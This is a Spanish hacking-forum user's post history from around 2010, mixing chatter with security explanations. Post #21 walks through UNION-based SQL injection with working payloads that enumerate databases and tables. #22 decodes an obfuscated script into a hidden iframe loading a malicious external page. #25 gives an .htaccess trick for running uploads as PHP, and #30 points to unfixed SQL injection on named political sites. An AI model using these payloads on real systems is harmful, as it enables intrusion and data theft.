Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - cgvwzq

#21
Bueno, lo primero es que no has averiguado que hay 25 tablas. Me explico, cuándo haces una consulta pedirás los campos que quieres ver, cuándo usas "union all select", vas a unir los resultados de la primera selección con los de la segunda. Así que vas a necesitar usar el mismo número de campos. Por ejemplo:

select * from tabla where c1='x'

Si la tabla "tabla", tiene 3 campos, para poder hacer una unión tendremos que usar "union select 1,2,3". Si la consulta es tal que así:

select c1,c2 from tabla where c1='x'

Al usar la unión tendremos que hacer "union select 1,2".

Ahora tiene sentido pensar que cuándo usamos el "order by X", estamos diciéndo que los resultados los ordene en función del campo X (si es un campo), o del campo nºX (si es un número). Por eso nos mostrará error si hacemos "order by 4", no hay un 4º elemento respecto al cuál ordenar.

Bién, eso lo primero... Luego, si dices que te muestra un 6 y un 5, significa que esos son los campos que se imprimen en pantalla (podrían corresponder al título y la fecha, por ejemplo). Así que los datos que quieras ver, tendrán que estar en los campos de los números que se muestren por pantalla... Es decir, en tu caso sería:

union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25

Si además te muestra un error, léelo. "Access denied for user:", pueder ver que  no tienes permisos para acceder a la base de datos information_schema. Aunque es posible que si puedas consultar las tablas de tu bd, en information_schema. Así que prueba con:

union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables where schema_table=database()

Si me he explicado mal o algo dilo y me esfuerzo más. Salu2!

#22
Nivel Web / Re: Ataque web por javascript
6 Julio 2010, 15:20 PM
Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente:

Código (javascript) [Seleccionar]
document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");


Se lo pasa a un eval() y se ejecuta...

No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida.

Saludos!
#23
Nivel Web / Re: XSS en Flickr y Blogger
27 Junio 2010, 15:05 PM
Y que lo digas... xD Esta semana además han sacado uno persistente en twitter, y yo acabo de encontrar un par para tuenti (uno de ellos persistente también). :S
#24
Nivel Web / Re: XSS en Flickr y Blogger
27 Junio 2010, 12:18 PM
Lo de blogger no es un fallo, simplemente permiten al propietario del sitio añadir todo el contenido que él quiera... Si te fijas, solo afecta a "tublog.blogspot.com" y no ha blogger. Así que no puedes molestar a nadie más que a tus visitantes.

Flickr no lo he usado, así que no digo nada... =P

Un saludo.
#25
Bueno, no me he leído ni el post entero. Pero viendo el dibujito ese ya me hago una idea de lo que pretende, y dejando de lado el que sea un fake o no, la idea es bastante absurda...

Como ha dicho shavane, lo único que hace el formulario html es enviar un archivo a un script php que lo procesará. De modo que tú idea, solo tendría cierto sentido en un escenario así:

- Página HTML con formulario. (upload.html)
- El encargado de validar el tipo de archivo es javascript, una función que será utilizada antes de hacer el submit en upload.html
- Un archivo php que almacena todo lo que se le envia (coladero.php)

Pero es igual una perdida de tiempo tu "método"; se pueden modificar cabeceras, modificar el formulario con firebug, crear un formulario en local con un action en el coladero.php, etc, etc.

Y bueno, si además se trata de un fake pues muy mal.... u_u Los reyes magos de elhacker.net te traerán carbón!

Y ya que estamos... Alguien ha subido alguna vez en un formulario un .htaccess tal que así?

AddType application/x-httpd-php .*

Salu2!

Edito: Yep!! No ví tu última modificación shavane... xD Pensé lo mismo, pero como dices si no comprueban el nombre, lo suelen modificar, pero...
#26
En si se dedica a perder el tiempo escribiendo posts superficiales que no aportan nada a nadie... ¬¬
#27
Esperaba que Leo respondiera: "Yo duermo"... xD

Yo entre 6 y 14 horas.
#28
Pues perdí la apuesta... xD
#29
Tampoco veo nada... Pero apuesto a que fue el mismo Troll el que lo hizo... ¬¬'

¡De verguenza!
#30
No hay que felicitar estas cosas... Primero porque no tiene ningún mérito, y segundo porqué si se politizamos los defaces puede haber sangre.
De todas formas es penoso que no lo hayan reparado aún, no sólo la vulnerabilidad, sino la noticia falsa.

@Winder, la de las juventudes socialistas lleva más de un año con un blind muy majote, guardan el hash y hacerlo a mano se hace pesado, pero con una tool se saca en segundos. Las juventudes populares tiene también otro sqli bastante vistoso.
Y si nos ponemos el psoe tiene un par de ciegas... España no va bién... :(